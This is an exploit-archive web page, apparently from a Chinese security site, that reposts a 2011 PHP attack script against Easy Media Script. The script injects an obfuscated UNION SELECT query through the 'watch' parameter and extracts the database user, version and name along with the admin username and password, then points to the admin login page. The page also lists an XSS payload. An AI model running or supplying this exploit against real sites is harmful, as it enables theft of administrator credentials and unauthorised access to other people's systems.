首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Easy Media Script SQL Injection Vulnerability
来源:Sec4Ever.com 作者:Lagripe-Dz 发布时间:2011-05-31  

<?php

if(!$argv[1])
die("

Usage   : php exploit.php [site]
Example : php exploit.php http://site.tld/[PATH]/

");
print_r("

# Tilte......: [ Easy Media Script SQL Injection ]
# Author.....: [ Lagripe-Dz ]
# Date.......: [ 27-o5-2o11 ]
# Location ..: [ ALGERIA ]
# HoMe ......: [ Sec4Ever.com & Lagripe-Dz.org ]
# Download ..: [ http://easymediascript.com/ ]
# Gr33tz ....: [ All Sec4ever Member'z ]

                      -==[ ExPloiT ]==-

# SQL Inj : http://site/ems/?watch=1'
# XSS     : http://site/ems/?go=\"><
ScRiPt>alert(0)</ScRiPt>

                       -==[ Start ]==-

");

$t=array("db_user   "=>"user()","db_version"=>"version()","db_name
"=>"database()",
"UserName  "=>"user","Password  "=>"pass");

foreach($t as $r=>$y){

$x=@file_get_contents($argv[1]."?watch=-1'/**//**//*!uNiOn*//**//**//*!sElEcT*//**//**/1,group_concat(0x".bin2hex("<$r>").",$y,0x".bin2hex("<$r>")."),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/**//**/fRoM/**//**/ip_admin%23");

preg_match_all("{<$r>(.*?)<$r>}i",$x, $dz);

echo $u = ($dz[1][0]) ? "[-] $r  : ".$dz[1][0]."\n" : "[-] $r  : Failed
!\n";

}
echo "[-] AdminPanel  : ".$argv[1]."ip-admin/login.php\n";

print_r("
                      -==[ Finished ]==-
");

# END .. !

?>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Apocalypse Remote Administrati
·iPhone4 FTP Server V1.0 - Empt
·LilHTTP Source Code Disclosure
·7-Technologies IGSS 9 Data Ser
·Trojan Nova Lite v2.6 Access V
·Brother HL-5370DW series auth
·WysGui <= 2.3 (FCKeditor) File
·FestOS <= 2.3c TinyBrowser Fil
·Bitweaver 2.x (FCKeditor) File
·Joomla 1.6.0 SQL Injection
·LostDoor v6 Remote Denial Of S
·Joomla 1.6.x Administrator PHP
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved